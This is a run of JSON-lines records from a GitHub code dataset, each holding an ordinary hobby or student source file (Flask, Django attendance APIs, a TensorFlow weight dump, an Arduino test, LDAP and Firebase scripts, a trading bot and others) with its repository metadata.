'tb_content'\n # id\n id = Column(BigInteger(), primary_key=True)\n # 文章标题\n title = Column(String())\n # .md文件名\n file_name = Column(String())\n # 菜单id\n menu_id = Column(BigInteger())\n # 创建时间\n create_time = Column(String())\n\n\n# 文章 的pydantic对象 pydantic模型\nclass Content(BaseModel):\n # id\n id: Optional[int] = None\n # 文章标题\n title: str\n # .md文件名\n file_name: str\n # 菜单id\n menu_id: Optional[int] = 0\n # 创建时间\n create_time: Optional[str] = None\n\n class Config:\n orm_mode = True\n\n\n# 文章查询\nclass ContentReq(BaseModel):\n menu_id: Optional[str] = None\n page: int\n pageSize: int\n","repo_name":"twodogleee/lite-blog","sub_path":"entity/ContentEntity.py","file_name":"ContentEntity.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"194449687","text":"import tensorflow as tf\nfrom tensorflow.python.platform import gfile\n\nGRAPH_PB_PATH = r'C:\\tensorflow\\plate_detector2\\models\\1306\\out-7252\\frozen_inference_graph.pb' #path to your .pb file\nwith tf.Session() as sess:\n print(\"load graph\")\n with gfile.FastGFile(GRAPH_PB_PATH,'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='')\n graph_nodes=[n for n in graph_def.node]\n\nwts = [n for n in graph_nodes if n.op=='Const']\n\nfrom tensorflow.python.framework import tensor_util\n\n\ntxt_file = open(\"weights.txt\",\"w\") \n\nfor n in wts:\n print(\"Name of the node - %s\" % n.name)\n print( \"Value - \") \n print(tensor_util.MakeNdarray(n.attr['value'].tensor))\n txt_file.write(\"Name of the node - %s\" % n.name)\n txt_file.write('\\n')\n txt_file.write( \"Value - \") \n txt_file.write('\\n')\n txt_file.write(str(tensor_util.MakeNdarray(n.attr['value'].tensor)))\n txt_file.write('\\n')\n\ntxt_file.close() ","repo_name":"juliomilani/license_plate_detection","sub_path":"models/out-7252/get_weights.py","file_name":"get_weights.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"40962319666","text":"\"\"\"\nA thin RDBMS-like layer on top of google spreadsheets.\n\nCarlos Scheidegger and Sam Gratzl, 2016\n\nWe recommend you use this under a virtual environment. Create\na virtualenv and then install the required libraries with\n\n$ pip install -r requirements.txt\n\nIf you need to run this locally, please contact Sam or Carlos for\nthe private key to access the spreadsheet from the script.\n\n\"\"\"\n\nimport json\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n##############################################################################\n# Data Loading\n\ndef load_credentials():\n scope = ['https://spreadsheets.google.com/feeds']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n 'files/service-account-key.json',\n scope)\n return credentials\n\ndef context(credentials):\n return gspread.authorize(credentials)\n\ndef load_sheet_by_name(gc, name):\n result = [v for v in gc.worksheets() if v.title == name]\n if len(result) == 0: raise Exception(\"Could not find '%s' sheet\" % name)\n if len(result) > 1: raise Exception(\"Too many '%s' sheets\" % name)\n return result[0]\n\ndef get_spreadsheet(name):\n return context(load_credentials()).open(name)\n\n##############################################################################\n# Poor man's RDBMS\n\ndef inner_join(lst1, lst2, column):\n result = []\n index_lst2 = dict((v[column], v) for v in lst2)\n for el in lst1:\n if el[column] in index_lst2:\n row = el.copy()\n row.update(index_lst2[el[column]])\n result.append(row)\n return result\n\ndef left_outer_join(lst1, lst2, column):\n result = []\n index_lst2 = dict((v[column], v) for v in lst2)\n for el in lst1:\n row = el.copy()\n if el[column] in index_lst2:\n row.update(index_lst2[el[column]])\n result.append(row)\n return result\n\n\n\ndef group_by(lst, selector):\n result = {}\n for item in lst:\n key = selector(item)\n if key not in result:\n result[key] = []\n result[key].append(item)\n return [{'Key': key, 'Value': value} for (key, value) in result.iteritems()]\n\ndef group_by_pairs(lst, selector):\n result = []\n for d in group_by(lst, selector):\n result.append((d['Key'], d['Value']))\n return result\n\ndef recolumn(lst, old_column, new_column):\n result = []\n for item in lst:\n item = item.copy()\n v = item[old_column]\n del item[old_column]\n item[new_column] = v\n result.append(item)\n return result\n\ndef column(name):\n def f(item): return item[name]\n return f\n","repo_name":"ieee-vgtc/ieeevis.org","sub_path":"scripts/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"18"} +{"seq_id":"30551511257","text":"#!/usr/bin/env python\n\nfrom utc_bot import UTCBot, start_bot\nimport proto.utc_bot as pb\nimport betterproto\nimport math\nimport re\n\nimport asyncio\nimport random\n\nfrom typing import Optional\n\n\"\"\"Constant listed from case packet\"\"\"\nDAYS_IN_YEAR = 252\nLAST_RATE_ROR_USD = 0.25\nLAST_RATE_HAP_USD = 0.5\nLAST_RATE_HAP_ROR = 2\n\n###### CONSTANTS ####\nTICK_SIZES = {\n '6RH': 0.00001, \n '6RM': 0.00001, \n '6RU': 0.00001, \n '6RZ': 0.00001, \n '6HH': 0.00002,\n '6HM': 0.00002, \n '6HU': 0.00002, \n '6HZ': 0.00002, \n 'RHH': 0.0001, \n 'RHM': 0.0001, \n 'RHU': 0.0001,\n 'RHZ': 0.0001, \n \"RORUSD\": 0.00001\n }\n#H, M, U, Z are Month Codes\n#6R: ROR/USD\n#6H: HAP/USD\n#RH: HAP/ROR\ncontracts = [\"6R\", \"6H\", \"RH\"]\ntimes = [ \"M\", \"U\", \"Z\"]\n\nFUTURES = [i+j for i in contracts for j in times]\n## ALGO #############\n\ndef E(book: list) -> float:\n total = sum([lvl.qty for lvl in book])\n ev = 0\n for ask in book:\n ev += float(ask.px) * ((ask.qty)/total)\n return ev\n\ndef VAR(book:list, EV: float) -> float:\n V = 0 \n for item in book:\n V += item.qty * (float(item.px) - EV)**2\n return V\n\n\n\n'''Rounds price to nearest tick_number above'''\ndef round_nearest(x, tick=0.0001):\n return round(round(x / tick) * tick, -int(math.floor(math.log10(tick))))\n\n'''Finds daily interest rates from annual rate'''\ndef daily_rate(daily_rate):\n return math.pow(daily_rate, 1/252)\n\nclass ArbitrageBot(UTCBot):\n async def check_arbitrage(self, update: pb.MarketSnapshotMessage):\n for t, asset in update.books.items():\n EV_ask = E(asset.asks)\n EV_bid = E(asset.bids)\n if (len(asset.bids) > 0):\n min_bid = float(min(asset.bids, key = lambda i: i.px).px)\n else:\n min_bid = 0\n self.data[t] = {\n 'exp_bid': EV_bid,\n 'stdDev_bid': VAR(asset.bids, EV_bid), \n 'exp_ask': EV_ask,\n 'stdDev_ask': VAR(asset.asks, EV_ask), \n 'min_bid': min_bid\n }\n #PATH A\n for time in times:\n asset = 'RH' + time\n try:\n path_a = (self.data[asset]['min_bid']) * \\\n (self.data[asset]['exp_bid']) * \\\n (self.data['RORUSD']['exp_bid'])\n except ZeroDivisionError:\n path_a = 0\n \n \n # print(f\"Path A : {path_a}\")\n if path_a > 1 and not self.arbit_opening:\n hap = await self.place_order(asset, pb.OrderSpecType.LIMIT, pb.OrderSpecSide.ASK, 100, round(self.data[asset]['min_bid'], 4))\n endhap = await self.place_order(asset, pb.OrderSpecType.LIMIT, pb.OrderSpecSide.BID, 100, round(self.data[asset]['exp_ask'], 4))\n rorusd = await self.place_order('RORUSD', pb.OrderSpecType.LIMIT, pb.OrderSpecSide.BID, 100, round(self.data['RORUSD']['exp_bid'] - self.data['RORUSD']['stdDev_bid'], 5))\n self.arbit_opening = True\n\n \n def update_pnl(self, update: pb.PnLMessage):\n pass\n \n \n def update_portfolio(self, update: pb.FillMessage):\n pass\n\n\n async def handle_round_started(self):\n \"\"\"\n Important variables below, some can be more dynamic to improve your case.\n Others are important to tracking pnl - cash, pos, \n Bidorderid, askorderid track order information so we can modify existing\n orders using the basic MM information (Right now only place 2 bids/2 asks max)\n \"\"\"\n self.cash = 0.0\n self.pos = {asset:0 for asset in FUTURES + [\"RORUSD\"]}\n # self.fair = {asset:5 for asset in FUTURES + [\"RORUSD\"]}\n self.mid = {asset: None for asset in FUTURES + [\"RORUSD\"]}\n self.max_widths = {asset:0.005 for asset in FUTURES}\n self.arbit_opening = False \n # self.bidorderid = {asset:[\"\",\"\"] for asset in FUTURES}\n # self.askorderid = {asset:[\"\",\"\"] for asset in FUTURES}\n\n\n stored_data = {'exp_bid':0, 'stdDev_bid': 0, 'exp_ask':0, 'stdDev_ask':0}\n self.data = dict([(i, stored_data) for i in FUTURES + ['RORUSD']])\n\n\n\n \"\"\"\n Constant params with respect to assets. Modify this is you would like to change\n parameters based on asset\n \"\"\"\n self.params = {\n \"edge\": 0.005,\n \"limit\": 100,\n \"size\": 10,\n \"spot_limit\": 10\n }\n \n\n async def handle_exchange_update(self, update: pb.FeedMessage):\n kind, _ = betterproto.which_one_of(update, \"msg\")\n # print('*'*50)\n if kind == \"market_snapshot_msg\":\n await self.check_arbitrage(update.market_snapshot_msg)\n if kind == \"pnl_msg\":\n my_m2m = self.cash\n for asset in (FUTURES + [\"RORUSD\"]):\n my_m2m += self.mid[asset] * self.pos[asset] if self.mid[asset] is not None else 0\n print(\"M2M\", update.pnl_msg.m2m_pnl, my_m2m)\n #Update position upon fill messages of your trades\n if kind == \"fill_msg\": \n self.arbit_opening = False\n if update.fill_msg.order_side == pb.FillMessageSide.BUY:\n print(f\"BUY: {update.fill_msg.asset}\")\n self.cash -= update.fill_msg.filled_qty * float(update.fill_msg.price)\n self.pos[update.fill_msg.asset] += update.fill_msg.filled_qty\n else:\n \n print(f\"SELL: {update.fill_msg.asset}\")\n self.cash += update.fill_msg.filled_qty * float(update.fill_msg.price)\n self.pos[update.fill_msg.asset] -= update.fill_msg.filled_qty\n\n\n if kind ==\"request_failed_msg\":\n pass\n if kind == \"liqidation_msg\":\n pass\n if kind == \"generic_msg\":\n pass\n \n \n \nif __name__ == \"__main__\":\n start_bot(ArbitrageBot)","repo_name":"Clarencechang3/UChiProj","sub_path":"clients/arbitrage.py","file_name":"arbitrage.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26708130813","text":"import nanpy\nimport time\n\nprint(\"CONNECT\")\n# Initialise connection\n# connection = nanpy.SerialManager(device=\"/dev/ttyUSB0\")\nconnection = nanpy.SerialManager(device=\"/dev/ttyUSB0\")\narduino = nanpy.ArduinoApi(connection=connection)\n\n# Define pin's\nD0 = 0 # D0/RX - PD0\nD1 = 1 # D1/TX - PD1\nD2 = 2 # D2 - PD2\nD3 = 3 # D3 - PD3\nD4 = 4 # D4 - PD4\nD5 = 5 # D5 - PD5\nD6 = 6 # D6 - PD6\nD7 = 7 # D7 - PD7\n\nD8 = 8 # D8 - PB0\nD9 = 9 # D9 - PB1\nD10 = 10 # D10 - PB2\nD11 = 11 # D11 - PB3\nD12 = 12 # D12 - PB4\nD13 = 13 # D13 - PB5\n\nA0 = 14 # D14 - A0 - PC0 - ADC[0]\nA1 = 15 # D15 - A1 - PC1 - ADC[1]\nA2 = 16 # D16 - A2 - PC2 - ADC[2]\nA3 = 17 # D17 - A3 - PC3 - ADC[3]\nA4 = 18 # D18 - A4 - PC4 - ADC[4] - SDA\nA5 = 19 # D19 - A5 - PC5 - ADC[5] - SCL\n\n# Control outputs\ntime.sleep(5)\nprint(\"DEFINE\")\narduino.pinMode(D2, arduino.OUTPUT)\narduino.pinMode(D3, arduino.OUTPUT)\narduino.pinMode(D4, arduino.OUTPUT)\narduino.pinMode(D5, arduino.OUTPUT)\narduino.pinMode(D6, arduino.OUTPUT)\narduino.pinMode(D7, arduino.OUTPUT)\ntime.sleep(5)\narduino.digitalWrite(D2, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D3, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D4, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D5, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D6, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D7, arduino.LOW)\nprint(\"OUTPUT HIGH\")\ntime.sleep(5)\narduino.digitalWrite(D2, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D3, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D4, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D5, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D6, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\narduino.digitalWrite(D7, arduino.HIGH)\nprint(\"OUTPUT LOW\")\ntime.sleep(5)\nprint(\"STOP\")\n","repo_name":"TimSw/test","sub_path":"nanpy control/nanpy test outputs.py","file_name":"nanpy test outputs.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11965254941","text":"import csv\nimport firebase_admin\nimport json\nfrom typing import Set\n\nfrom argparse import ArgumentParser\nfrom firebase_admin import credentials, firestore\n\n\nVALID_CUISINES: Set[str] = set()\nwith open('valid_cuisines.txt', 'r') as fin:\n for line in fin:\n VALID_CUISINES.add(line.strip())\n\n\ndef process_file(path: str):\n db = firestore.client()\n\n with open(path, 'r') as fin:\n reader = csv.reader(fin, delimiter=',')\n\n for idx, tokens in enumerate(reader):\n if idx > 0:\n place_id = tokens[0]\n cuisines = [t.strip() for t in tokens[1:] if len(t.strip()) > 0]\n\n for cuisine in cuisines:\n assert cuisine in VALID_CUISINES, 'Found cuisine {} on line {}'.format(cuisine, idx)\n\n place_data = {\n 'cuisines': cuisines\n }\n db.collection('places').document(place_id).set(place_data, merge=True)\n\n if (idx % 100) == 0:\n print('Completed {} places.'.format(idx))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--cert-path', type=str, required=True)\n parser.add_argument('--cuisines-path', type=str, required=True)\n args = parser.parse_args()\n\n # Create the database client\n with open(args.cert_path, 'r') as fin:\n token_dict = json.load(fin)\n\n creds = credentials.Certificate(token_dict)\n firebase_admin.initialize_app(creds)\n\n # Process the cuisines\n process_file(path=args.cuisines_path)\n","repo_name":"upthe/taste-server","sub_path":"scripts/legacy/upload_cuisines.py","file_name":"upload_cuisines.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35824500368","text":"from flask import Flask, render_template, request, flash\nfrom dataclasses import dataclass\nimport sqlite3\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = b'oxabadidea'\n\n\n@app.get(\"/\")\ndef index_page():\n con = sqlite3.connect(\"points.db\")\n cur = con.cursor()\n return render_template(\"index.html\", coords=fetch_markers(cur))\n\n\n@app.post(\"/\")\ndef receive_notification():\n data = request.form\n con = sqlite3.connect(\"points.db\")\n cur = con.cursor()\n\n try:\n longitude = float(data[\"longitude\"])\n latitude = float(data[\"latitude\"])\n title = data[\"title\"]\n description = data[\"description\"]\n except:\n print(\"Invalid data received\")\n flash(\"Invalid data types\")\n markers = fetch_markers(cur)\n\n return render_template(\"index.html\", coords=markers), 400\n\n cur.execute(\n \"INSERT INTO markers (longitude, latitude, title, description) VALUES (?, ?, ?, ?)\",\n (longitude, latitude, title, description),\n )\n con.commit()\n\n markers = fetch_markers(cur)\n return render_template(\"index.html\", coords=markers)\n\n\ndef fetch_markers(cur):\n markers = cur.execute(\"SELECT * FROM markers\").fetchall()\n return [DataPoint(m[1], m[2], m[3], m[4]) for m in markers]\n\n\n@dataclass\nclass DataPoint:\n longitude: float\n latitude: float\n title: str\n description: str\n\n","repo_name":"BeaconBrigade/wildfire-map","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"869206602","text":"import grpc\n\nfrom goodDataML.connection.gooddata import register_do, register_mpc\nfrom goodDataML.learning.testnet.utils import get_config_file\n\nif __name__ == '__main__':\n config = get_config_file('./local_config.json')\n\n good_data_service_channel = grpc.insecure_channel(config['good_data_service_address'],\n options=[\n ('grpc.max_send_message_length', 5 * 1024 * 1024),\n ('grpc.max_receive_message_length', 5 * 1024 * 1024),\n ])\n\n for do_name in config[\"dos\"]:\n do_config = config[do_name]\n register_do(public_key=do_config['public_key'],\n channel=good_data_service_channel,\n node_info={'address': do_config['ip_address'], 'port': do_config['port']})\n\n for mpc_name in config[\"mpcs\"]:\n mpc_config = config[mpc_name]\n register_mpc(channel=good_data_service_channel,\n mpc_info={'public_key': mpc_config['public_key'],\n 'node_info': {'address': mpc_config['ip_address'], 'port': mpc_config['port']}})\n","repo_name":"good-data-foundation/federated-learning-sdk","sub_path":"run/register_DOs.py","file_name":"register_DOs.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"20255436652","text":"import pprint #pprint makes the print look cleaner\n\nmessage = '''adjsajdbnasa\n\n bndsDASDF\n\n\nS''' #if I use three quotes to open and end a string, I can format it in any way!\ncount = {}\n\nfor character in message.upper():\n count.setdefault(character,0) #adds letter seen for the first time as a key and defaults its value to 0\n count[character] = count[character] + 1\n\npprint.pprint(count)\n\n#to have it printed as a string instead of printed to the shell, I can use pprint.format e.g:\ntext = pprint.pformat(count)\n\nprint(text)\n","repo_name":"wijdanb/Python-scripts","sub_path":"charactercount.py","file_name":"charactercount.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4416025496","text":"#!/usr/bin/python3\n# @author Ashley Perrin\n# 4/27/2020\n# CS 224 Python Project separate gui\n\nimport tkinter as tk\nimport term as amsearch\nfrom PIL import ImageTk, Image\n\nTK_SILENCE_DEPRECATION = 1 # Gets rid of warning message about TK version\n # GUI Code Elements\nwin = tk.Tk() # Creating tk window object\nwin.geometry(\"1000x800\") # Setting width & height of window\nwin.title(\"BotShopp\") # titling window\nwin.configure(bg = \"grey\") # sets window color grey\ncur_display = 0\n\ndef send_input():\n global cur_display\n cur_display = cur_display + 1\n if(cur_display == 1):\n cur_display = 0\n output.delete(\"1.0\", \"end-1c\")\n\n input = search.get(\"1.0\",\"end-1c\")\n output_item = amsearch.main(1, input)\n search.delete(\"1.0\", \"end-1c\")\n output.insert(\"1.0\", output_item)\n\nwelcome = tk.Label(win, # Creating welcome label with specifications\n text = \"Welcome to your Amazon personal shopper bot!\\n Enter any item you'd like to search for:\",\n font = \"Ayuthaya 24\",\n relief = \"groove\",\n bd = 5,\n width = 80,\n foreground = \"white\",\n background = \"navy blue\")\nwelcome.pack()\n\nframe = tk.Frame(win,\n bg = \"grey\",\n height = 500,\n width = 100,\n relief = \"groove\",)\n\nframe.pack(padx=5, pady=10)\n\nsearch_button = tk.Button(frame,\n text = \"Search\",\n bd = 5,\n font = \"Ayuthaya 17\",\n relief = \"raised\",\n command = lambda: send_input())\n\nsearch_button.pack(padx=5, pady=10, side=tk.LEFT)\n\nsearch = tk.Text(frame,\n bg = \"khaki\",\n bd = 5,\n foreground = \"black\",\n font = \"Ayuthaya 17\",\n width = 55,\n height = 1,\n relief = \"groove\",\n )\n\nsearch.pack(padx=5, pady=10, side=tk.LEFT)\n\noutput_frame = tk.Frame(win,\n bg = \"gray\",\n height = 500,\n width = 200,\n relief = \"groove\",)\n\noutput_frame.pack()\n\noutput= tk.Text(output_frame,\n bg = \"white\",\n bd = 5,\n foreground = \"black\",\n font = \"Ayuthaya 17\",\n #state='disabled',\n width = 100,\n height = 10,\n relief = \"groove\",\n )\noutput.pack(padx=5, pady=10, side=tk.LEFT)\n\nload = Image.open(\"avail.png\")\nloadsized = load.resize((190,125))\nrender = ImageTk.PhotoImage(loadsized)\npane = tk.Label(win, image = render)\npane.image = render\n\npane.pack()\n\nwin.mainloop() # Runs all aspects of gui`\n","repo_name":"ashperrin/224PythonProject","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74498542120","text":"\n'''\nUsing concept of inheritance\n\n'''\n\n\nfrom collections import deque\n\n\nclass Queue(deque):\n \n def __init__(self):\n super(deque,self).__init__()\n \n def enqueue(self,val):\n super().appendleft(val)\n \n def dequeue(self):\n return super().pop()\n \n def is_empty(self):\n length=len(self)\n if length==0:\n return True\n else:\n return False\n \nq=Queue()\nq.enqueue(23)\nq.enqueue(24)\nq.dequeue()\nprint(q.dequeue())\nprint(q.is_empty())\n","repo_name":"ma-heshpandey/Algorithm","sub_path":"Stack And Queue/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31640202775","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport random\n\nfrom ldappy import load_config, connect\nfrom ldappy import create_group, check_gid_number\n\n\ndef add_group(conn, domain_dn, domain_dns, group_name):\n \n # find a gid_number\n gid_number = None\n while gid_number is None:\n gid_number = random.randint(5000, 50000)\n \n if check_gid_number(conn, domain_dn, gid_number) == False:\n gid_number = None\n \n # greate the group\n create_group(conn, domain_dn, domain_dn, group_name, gid_number)\n \n return gid_number\n \n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', help='path to config file', type=str, default=\"~/.config/s1767/admin/ldap.yaml\")\n parser.add_argument(\"group_name\", help=\"group name\", type=str)\n args = parser.parse_args()\n \n config = load_config(args.config)\n \n _, conn = connect(config['ldap_uri'], config['bind_dn'], config['bind_pw'],\n start_tls=config['start_tls'], \n ca_cert_file=config['ca_cert_file']\n )\n root_dn = config['root_dn']\n root_dns = config['root_dns']\n \n gid_number = add_group(conn, root_dn, root_dns, args.group_name)\n print(f\"Created group:\")\n print(f\" name: {args.group_name}\")\n print(f\" id number: {gid_number}\")\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"studio1767/admin-utils","sub_path":"ldap-users/add-group.py","file_name":"add-group.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4119756874","text":"#git ls-files | grep rs | xargs wc -l\nimport os\nfrom subprocess import run\nif __name__ == '__main__':\n for directory in os.listdir(os.getcwd()):\n if directory != 'compile.py':\n print(\"going to compile {}\".format(directory))\n os.chdir(directory)\n run([\"cargo\", \"clean\"])\n run([\"cargo\", \"update\"])\n run([\"cargo\", \"fmt\"])\n run([\"cargo\", \"rustc\", \"--release\", \"--\", \"-C\", \"target-cpu=native\", \"-C\", \"lto\"])\n\n run([\"git\", \"add\", \"src/*\"])\n run([\"git\", \"commit\", \"-m\", \"Cargo fmt\"])\n os.chdir('..')","repo_name":"DutchGhost/Advent-of-Code-2017","sub_path":"Rust/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37185236973","text":"from django.shortcuts import render\n\nfrom django.views import generic\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets \nfrom rest_framework.decorators import api_view, permission_classes\n\nfrom .models import Office,AttendanceUser,Attendance,Crash,Analytics\nfrom django.core import serializers\nfrom .serializers import OfficeSerializer,UserSerializer,AttendanceSerializer,CrashSerializer,LoginSerializer\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import authenticate\n \nclass IndexView(generic.ListView):\n template_name = 'apis/index.html' \n \nclass OfficeViewSet(viewsets.ModelViewSet):\n queryset = Office.objects.all().order_by('name')\n serializer_class = OfficeSerializer\n \nclass AttendanceViewSet(viewsets.ModelViewSet):\n queryset = Attendance.objects.all()\n serializer_class = AttendanceSerializer\n \n \n@api_view(['GET'])\ndef getoffices(request): \n queryset = Office.objects.filter(isactive=True).order_by('name')\n serialized=OfficeSerializer(queryset,many=True) \n \n response={'response':{'msg':'success','status':200,'data':serialized.data}} \n return Response(response, status=status.HTTP_200_OK) \n \n \n \n \n@api_view(['GET'])\n@permission_classes((IsAuthenticated,))\ndef getattendance(request): \n queryset = Attendance.objects.filter(isactive=True)\n serialized=AttendanceSerializer(queryset,many=True) \n response={'response':{'msg':'success','status':200,'data':serialized.data}} \n return Response(response, status=status.HTTP_200_OK) \n\n\n\n@api_view(['POST'])\n@permission_classes((IsAuthenticated,))\ndef add_attendance(request):\n serialized = AttendanceSerializer(data=request.data)\n if serialized.is_valid():\n token=request.META['HTTP_AUTHORIZATION'][6:]\n token_instance=Token.objects.get(key=token)\n theuser=AttendanceUser.objects.filter(isactive=True).get(pk=token_instance.user_id)\n attendance = Attendance.objects.create(\n date=serialized.data['date'],\n time=serialized.data['time'],\n lat=serialized.data['lat'],\n lng=serialized.data['lng'],\n ispresent=serialized.data['ispresent'],\n user=theuser,\n ) \n Analytics.objects.create(action='add_attendance',search_params='',app_version=theuser.app_version,platform=theuser.platform,brand=theuser.brand,device=theuser.device,device_model=theuser.device_model,user=theuser)\n \n response={'response':{'msg':'success','status':200,'data':serialized.data}} \n return Response(response, status=status.HTTP_200_OK)\n else:\n return Response(serialized._errors, status=status.HTTP_400_BAD_REQUEST)\n \n \n@api_view(['POST'])\n@permission_classes((IsAuthenticated,))\ndef logout(request): \n \n token=request.META['HTTP_AUTHORIZATION'][6:]\n instance = Token.objects.get(key=token)\n theuser=AttendanceUser.objects.filter(isactive=True).get(pk=instance.user_id)\n instance.delete()\n \n theuser=AttendanceUser.objects.filter(isactive=True).get(pk=instance.user_id)\n Analytics.objects.create(action='logout',search_params='',app_version=theuser.app_version,platform=theuser.platform,brand=theuser.brand,device=theuser.device,device_model=theuser.device_model,user=theuser)\n \n response={'response':{'msg':'success','status':200}} \n return Response(response, status=status.HTTP_200_OK) \n \n@api_view(['POST'])\ndef add_crash(request): \n serialized = CrashSerializer(data=request.data)\n if serialized.is_valid():\n Crash.objects.create(\n exception=serialized.data['exception'],\n app_version=serialized.data['app_version'],\n platform=serialized.data['platform'],\n brand=serialized.data['brand'],\n device=serialized.data['device'],\n device_model=serialized.data['device_model']\n )\n response={'response':{'msg':'success','status':200}}\n return Response(response, status=status.HTTP_200_OK)\n else:\n return Response(serialized._errors, status=status.HTTP_400_BAD_REQUEST)\n \n \n@api_view(['POST'])\ndef register(request):\n serialized = UserSerializer(data=request.data)\n if serialized.is_valid():\n newuser=AttendanceUser.objects.create_user(\n serialized.data['username'],\n password=serialized.data['password'],\n fullname=serialized.data['fullname'],\n phone=serialized.data['phone'],\n office=serialized.data['office'],\n app_version=serialized.data['app_version'],\n platform=serialized.data['platform'],\n brand=serialized.data['brand'],\n device=serialized.data['device'],\n device_model=serialized.data['device_model'],\n )\n Analytics.objects.create(action='register',search_params='',app_version=serialized.data['app_version'],platform=serialized.data['platform'],brand=serialized.data['brand'],device=serialized.data['device'],device_model=serialized.data['device_model'],user=newuser)\n \n token=Token.objects.create(user=newuser)\n \n data={\n 'user_id':newuser.id,\n 'username':newuser.username,\n 'fullname':newuser.fullname,\n 'phone':newuser.phone,\n 'office_id':newuser.office.id,\n 'office_name':newuser.office.name,\n 'token':token.key\n }\n\n response={'response':{'msg':'success','status':200,'data':data}} \n return Response(response, status=status.HTTP_200_OK)\n else:\n return Response(serialized._errors, status=status.HTTP_400_BAD_REQUEST)\n \n \n \n \nclass login(ObtainAuthToken):\n def post(self, request, format=None):\n data = request.data\n\n username = data.get('username', None)\n password = data.get('password', None)\n app_version = data.get('app_version', None)\n platform= data.get('platform', None)\n brand= data.get('brand', None)\n device= data.get('device', None)\n device_model= data.get('device_model', None)\n \n user = authenticate(username=username, password=password)\n \n user.app_version=app_version\n user.platform=platform\n user.brand=brand\n user.device=device\n user.device_model=device_model\n user.save()\n \n Analytics.objects.create(action='login',search_params='',app_version=app_version,platform=platform,brand=brand,device=device,device_model=device_model,user=user)\n \n if user is not None:\n if user.isactive==True:\n token, created = Token.objects.get_or_create(user=user)\n \n return Response(\n {\n 'response':\n {\n 'msg':'success',\n 'status':200,\n 'data':{\n 'user_id': user.pk,\n 'username': user.username,\n 'fullname': user.fullname,\n 'phone': user.phone,\n 'office_id': user.office.id, \n 'office_name':user.office.name,\n 'token': token.key, \n }\n }\n })\n \n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"aamirbilvani/Attendance-Tracker-Django","sub_path":"attendanceTracker/apis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70151274605","text":"# -*- coding: utf-8 -*-\nimport unetsl\nimport unetsl.config\n\nimport pathlib\nimport json\n\n\n\nclass HeadConstants:\n name = \"name\"\n n_labels = \"n_labels\"\n bits = \"bits\"\n activation = \"activation\"\n depth = \"depth\"\n resampler = \"resampler\"\n offset = \"offset\"\n\ndef getDefaultCerberusConfig():\n unet = unetsl.config.getDefaultModelConfig()\n \n unet.pop(unetsl.N_LABELS, None)\n unet.pop(unetsl.ACTIVATION, None)\n \n dflt = {\"unet\" : unet,\n \"heads\": 